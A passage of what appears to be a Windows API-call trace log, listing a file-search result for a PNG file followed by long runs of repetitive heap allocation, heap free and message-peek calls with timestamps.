nFileSizeLow=0x5acb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XI5TTs XOUtx12juL.png", cAlternateFileName="XI5TTS~1.PNG")) returned 0 [0190.461] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0190.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0190.462] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0190.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0190.462] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0190.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.464] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.465] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0190.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.473] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0190.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.506] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0190.506] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 